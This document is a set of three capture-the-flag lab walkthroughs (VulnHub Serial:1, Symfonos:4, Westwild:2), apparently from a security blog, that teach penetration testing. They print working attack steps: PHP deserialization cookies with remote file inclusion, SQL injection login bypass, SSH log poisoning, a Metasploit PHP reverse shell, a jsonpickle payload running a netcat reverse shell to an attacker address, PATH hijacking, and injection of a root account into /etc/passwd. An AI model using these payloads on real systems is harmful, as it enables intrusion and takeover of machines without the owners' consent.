Serial: 1 Vulnhub Walkthrough


Today we are going to take a new challenge Ted. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here

Security Level: Beginner/ Intermediate
Penetrating Methodology:
Scanning
·        NMAP
·        Dirb
Enumeration
·        Browsing the website
·        Burpsuite 
Exploitation
·        Analyze and change php code to get
Privilege Escalation
·        Sudo permission for vim command

Walkthrough:
Scanning:
First thing first, scan the vulnerable machine using nmap
nmap -p-  -A 192.168.2.6
Here we got only two ports, 80 and 22
We browsed the website on port 80 and got the message hinting that we might get something in cookies
When we intercepted the request, there was a very lengthy value for a cookie. The value for cookie user was a base64 encoded value

After decoding the value gave us a username, we tried to change it to something else but not possible

For a moment, we kept it aside and tried to get all the available directories using dirb
Here we found one interesting directory named backup
We visited the backup directory on the web server and found a zip file over there
We downloaded the zip file and extracted the contents and found three files
Let’s check the contents of the files starting from
1)      index.php
2)      user.class.php
3) log.class.php
After carefully analysing the code of file index.php and user.class.php, we came to know that we can try to get base64 encoded value of cookie user by just adjusting a function call from index.php to user.class.php. So, we added one single line in the end to display the base64 value encoded in similar format as the user cookie value but this time with another user i.e. admin
echo base64_encode(serialize(new User(‘admin’)));

Now let’s try to run the php code and check the output of the same,
php user.class.php
we got a base64 encoded value which we will try to use as the value of user cookie
Well the base64 cookie value worked but nothing much helpful, so we started to look for something else. We checked the log.class.php, we found that the Log class is having a include function to include a log file but the parameter type_log is not assigned any value. We assigned the valiable with a the path of passwd file as the value.
Also alongside that we made a small change in the user class, we replaced the function call of the Welcome class to the function call of constructor of the Log class.
Now when we tried to run the user.class.php file again, we found that the passwd file was displayed and we got the base64 encoded value which we can use as the cookie.
php user.class.php
When we tried the base64 encoded cookie value in the webpage, we got the passwd file from the target machine, confirming we have a file inclusion vulnerability
Now that we have verified the presence of file inclusion vulnerability, we created a remote code execution file and started the python server
Now we edit the log class to change the file path variable to the url of our shell
Private $type_log = “http://192.168.2.3/shell.php”
After putting the code in place, its time to get the cookie value to execute
php user.class.php
When we used the cookie value and provided the cmd parameter with ifconfig command
While checking the contents, we found a file named credentials.txt.bak
We tried to check the contents and found something like a set of credentials, let’s try to use these credentials
We used the credentials for ssh and got access. While enumerating we found the first flag
ls
cat flag.txt
Now we have to escalate the privilege, we tried to get sudo permissions for current user. We found we have sudo permissions for vim editor
sudo -l
We used privilege escalation through vim editor and got the root shell
sudo vim
:!/bin/bash
cd /root
ls
cat fl4g.txt

Symfonos:4 Vulnhub Walkthrough


Hello, guys today we are going to take a new challenge Symfonos:4, which is a third lab of the series Symfonos. The credit for making this VM machine goes to “Zayotic” and it’s another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM HERE.
Level: Intermediate

Penetrating Methodology:

Network Scanning
·        Netdiscover
·        Nmap
Enumeration
·        Browsing HTTP Service
·        Directory Bruteforcing using dirb
Exploitation
·        SQL injection to bypass Login Form
·        Using LFI to read the Logs
·        Using SSH log poisoning using PHP malicious script
·        Using Metasploit to create PHP reverse shell
·        Port Forwarding
·        Encoding and Decoding Cookies
Privilege Escalation
·        Inject netcat reverse shell into Json Pickle string
·        Replacing cookie with Base64 Encoded Reverse Shell
·        Getting Root Access

Walkthrough

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box.  But first, let’s discover the IP Address of the lab. i.e 192.168.0.23
netdiscover

Once the Ip Address is acquired. Now we will run an aggressive scan using nmap for proceed further.
nmap -A 192.168.0.23


Enumeration

For more details, we will need to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service since port 80 is open.


Let’s further enumerate the target machine through a directory Bruteforce. For this, we are going to use the dirb tool. This gave us a page named “atlantis.php” and “sea.php”. After browsing both directories we noticed “sea.php” was redirecting to “atlantis.php”.
dirb http://192.168.0.23/ /usr/share/wordlists/dirb/big.txt -X .php



Exploitation
So, browsing Atlantis.php directory came out to be a Login Form. To further enumerate the form, we tried combinations of SQL Injection. After few tries, we were able to bypass the Login form using ‘or ‘1’=’1’ as a username. And for password we gave any random value.

We got a prompt to select a god after successfully bypassing the Login form. We selected any random god i.e Hades and were redirected to a URL which left us inquisitive.

After seeing all the possibilities, it quickly strikes let’s try Local File Inclusion. After trying to find /etc/passwd file but didn’t succeed, after we thought of reading the log file using LFI. And we successfully did read the logs.
So we try to inject malicious PHP command via SSH for poisoning auth logs as shown in the image below, so that hopefully we can use a ‘C’ parameter to run arbitrary systems commands on the Target Machine.
ssh ‘’@192.168.0.23

Indeed we have to way to execute commands on the target machine. To confirm it we simply checked the id of the Target machine.
Time to Fire Up Metasploit, by using Web-Delivery module we have created a malicious link for PHP reverse shell.
use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.025
exploit

We need to run the above PHP reverse shell in the ‘C’ parameter in the URL as shown in the image.

On successfully executing the Shell, We saw a new session is opened. To get the complete meterpreter we need to interact with the opened session. And to confirm we checked the system information.
sessions 1
sysinfo

We thought of checking the ongoing processes. After looking out, we saw an interesting process which was running on 127.0.0.1:8080 but we didn’t saw it in our Nmap result because it was an internal process.
ps   
            
Let’s forward the port 8080 to our port 8888.
portfwd add -l 8888 -p 8080 -r 127.0.0.1

Once done with port forwarding. We browsed the forwarded port 8888 with Localhost on the browser but where getting redirected to a page /whoami.

I guess we need to manually go back to main page. Then we got a thought that we might have a cookie for the username.

Without wasting time lets intercept the request of this page using Burp Suite. So the cookie is base64 encoded. We need to decode it.
*Since port 8080 was busy with other process. So we change the listening of Burpsuite to any random port. Dont forget to configure it before intercepting the request.

We decoded the cookie using Burp Suite inbuilt decoder. After searching about the decoded string, we came to know it is a jsonpickle string.
{"py/object": "app.User", "username": "Poseidon"}


Making some modification in the jsonpickle string, we added a netcat reverse shell and encoded the whole string into base64.
{"py/object": "__main__.Shell", "py/reduce": [{"py/function": "os.system"}, ["/usr/bin/nc -e /bin/sh 192.168.0.25 5555"], 0, 0, 0]}


We need to replace the old cookie with the new base64 encoded string and forward the request in Burp Suite. Also don’t forget to spawn a netcat listener on port 5555 before forwarding the request on your Kali Terminal.

Privilege Escalation:

We successfully got the netcat session with root access. To confirm we have checked the Id of the user.  Only thing left to do is we went inside the ROOT directory and Read our FLAG.
nc -lvp 5555
id
cd/root
ls
cat proof.txt


Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Westwild: 2 Vulnhub Walkthrough


Today we are going to solve another boot2root challenge called “Westwild: 2”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to Hashim Alsharef. Let’s start and learn how to successfully breach it.
Level: Intermediate
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.
Penetration Testing Methodology
Network Scanning
·        Netdiscover
·        Nmap
Enumeration
·        Browsing HTTP Service
·        Directory Bruteforce using dirb
·        Using wget to download user and password list
Exploiting
·        Bruteforcing Login credentials using BurpSuite
·        Searching and Getting Exploit using Searchsploit
·        Using Metasploit cmsms_showtime2_rce exploit
Privilege Escalation
·        SUID Binaries
·        PATH Variable
·        LinEnum.sh
·        Editing /etc/passwd
·        Capture the flag
Walkthrough
Network Scanning
We will start by scanning the network using Netdiscover tool and identify the host IP address.


We can identify our host IP address as 192.168.1.105.
Now let’s scan the services and ports of target machine with nmap. Nmap has a special flag to activate aggressive detection, namely -A. Aggressive mode enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute).
nmap -A 192.168.1.105


From its result, we found ports 22(SSH), 80(HTTP) were open.
Enumeration
For more detail, we will be needing to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service.
We got the CMS: Made Simple Welcome page as shown in the given below image.


Now we further use dirb for directory enumeration.  DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analysing the response. This gave us multiple files hosted via the CMS but aspadmin piqued our interest.
dirb http://192.168.1.105


As aspadmin was an interesting result of dirb scan, we decided to browse the URL in our browser.

Further we downloaded user and password list using wget. The Wget command is a command line utility that enables the user to download single or multiple files simultaneously from internet or server by the help of many protocols like HTTP, HTTPS and FTP. This command performs many operations that can be used by any user while downloading any file from the internet such as: Downloading multiple files, downloading in the background, resuming downloading, renaming any downloaded file, Mirror downloading.
wget http://192.168.1.105/admin/aspadmin/user.list
wget http://192.168.1.105/admin/aspadmin/password.list

Exploiting

Bruteforcing Login Credentials
First, we will intercept the request of the login page of the CMS, where we have given a random username and password. Then click on login, the burp suite will capture the request of the login page.

Now we will send the captured request to the Intruder by clicking on the Action Tab. Afterwards we will open the Intruder tab and select positions (username and password) which will get highlighted as shown in the image given. Now we will select the payload position. Firstly, we will press on the Clear button given at right of window frame. Now we will select the fields where we want to attack which is the username and password and click on Add button. Followed by that we will choose the Attack type as Cluster Bomb.
In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.


And Boom!!, we got the username and password.  Username is west and password is Madison.


And to confirm the username and password, we will enter the matched username and password in the CMS. This will generate a welcome message which shows our success in the simple list payload attack. Here after a bit enumeration we found out that we have a plugin installed named “Showtime2” as shown in the image.

Searchsploit
Now, to exploit the CMS, we will use searchsploit for this task. We searched the plugin in searchsploit as shown in the given image. Searchsploit gave us a Remote Code Execution Exploit. And moreover, it is a part of Metasploit Framework.

searchsploit showtime2


First, we will select the exploit with the help of use command. After that we will select the Remote host IP Address, followed by the username and password that we extracted earlier. Later, we will use exploit command to run the exploit. This will give us a meterpreter shell on the target system. Now that we have the meterpreter, we ran the shell command to get the bash shell. But this we gave us an improper shell, so we will convert it into a proper shell using the python one-liner.
msf5 > use exploit/multi/http/cmsms_showtime2_rce
msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhosts 192.168.1.105
msf5 exploit(multi/http/cmsms_showtime2_rce) > set username west
msf5 exploit(multi/http/cmsms_showtime2_rce) > set password Madison
msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit
meterpreter > shell
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
And Boom!! we got the shell. Then without wasting any time we searched for any file having SUID or 4000 permission with help of Find command.
By using the following command, you can enumerate all binaries having SUID permissions:
find / -perm -u=s -type f 2>/dev/null
The Find command gave us an interesting file named “network_info”. We will try to enumerate this further.


Privilege Escalation
Now, we need to compromise the target system further to the escalate privileges. PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories that hold all executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with the help of PATH Variable in response to commands executed by a user.
/usr/bin/network_info
cd /tmp
echo “/bin/bash” > ifconfig
chmod 777 ifconfig
export PATH=/tmp:$PATH
whoami


Now to proceed further we will use wget to download LinEnum.sh. Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.
cd /tmp
wget http://192.168.1.106/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh


After the successful run of the LinEnum Script, we find some important information that the /etc/passwd file is readable and writable by the user “wside”.


Now let’s edit /etc/passwd file. Sometimes it is not possible to execute passwd command to set the password of a user; in that case, we can use OpenSSL command which will generate an encrypted password with salt.
OpenSSL passwd will compute the hash of the given password using salt string and the MD5-based BSD password algorithm 1.
openssl passwd -1 -salt user3 pass123


After, generating the salted hash we edited the /etc/passwd using echo command to add our password hash.
wside@westside:/tmp$ Echo ‘raj:$1$user3$rAGRVf5p2jYTqt0W5cPu/:0:0::/root:/bin/bash’ >> /etc/passwd
wside@westside:/tmp$ su raj